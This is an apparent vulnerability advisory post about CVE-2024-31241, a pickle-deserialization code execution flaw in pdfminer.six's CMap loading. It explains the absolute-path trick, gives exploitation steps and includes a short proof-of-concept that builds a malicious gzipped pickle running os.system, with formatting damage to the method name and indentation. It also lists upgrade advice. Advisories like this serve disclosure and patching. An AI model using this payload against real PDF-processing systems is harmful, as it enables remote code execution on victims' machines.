pdfminersix, Arbitrary Code Execution, CVE-2024-31241 (Critical)

Listen to this Post

The vulnerability exists in the `CMapDB._load_data()` method. This function is responsible for loading Character Map (CMap) data, which is crucial for correctly interpreting text encoding within PDFs. To improve performance, pdfminer.six stores pre-processed CMap data as compressed pickle files (.pickle.gz) in its `cmap/` resource directory. When a PDF specifies a CMap, the library constructs a file path by appending `.pickle.gz` to the CMap name and then uses `pickle.loads()` to deserialize the file’s contents. The path construction logic is flawed; it uses `os.path.join` but if the provided CMap name is an absolute path (e.g., /tmp/evil), the intended resource directory is ignored. An attacker can craft a PDF that defines a CMap with an absolute path pointing to a malicious pickle file they control. When pdfminer.six processes this PDF, it will deserialize the attacker’s file using pickle.loads(), which inherently executes arbitrary Python code defined within the pickle payload. This leads to full Remote Code Execution (RCE) in the context of the application processing the PDF.
Platform: Python
Version: pdfminer.six < 20241214
Vulnerability: Arbitrary Code Execution
Severity: Critical
date: 2024-12-13

Prediction: 2024-12-20

What Undercode Say:

find /path/to/python/site-packages -name "cmapdb.py" -exec grep -n "_load_data" {} \;
Proof-of-Concept Code Snippet
import pickle
import gzip
class RCE:
def <strong>reduce</strong>(self):
import os
return (os.system, ('echo "PWNED"',))
with gzip.open('/tmp/evil.pickle.gz', 'wb') as f:
pickle.dump(RCE(), f)

How Exploit:

Attacker creates a malicious PDF specifying an absolute path for a CMap (e.g., /tmp/evil). They place a malicious `evil.pickle.gz` file at that location. When the victim uses pdfminer.six to parse the PDF, the library loads and deserializes the malicious pickle, executing the embedded code.

Protection from this CVE:

Upgrade pdfminer.six to version 20241214 or later. This version replaces the unsafe `pickle.loads()` with a safe, custom deserialization function for CMap data.

Impact:

Remote Code Execution. The impact is system-dependent. On Windows, exploitation is easier via SMB/WebDAV paths. On Linux/macOS, it requires the attacker to write a file to a known location on the target filesystem.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top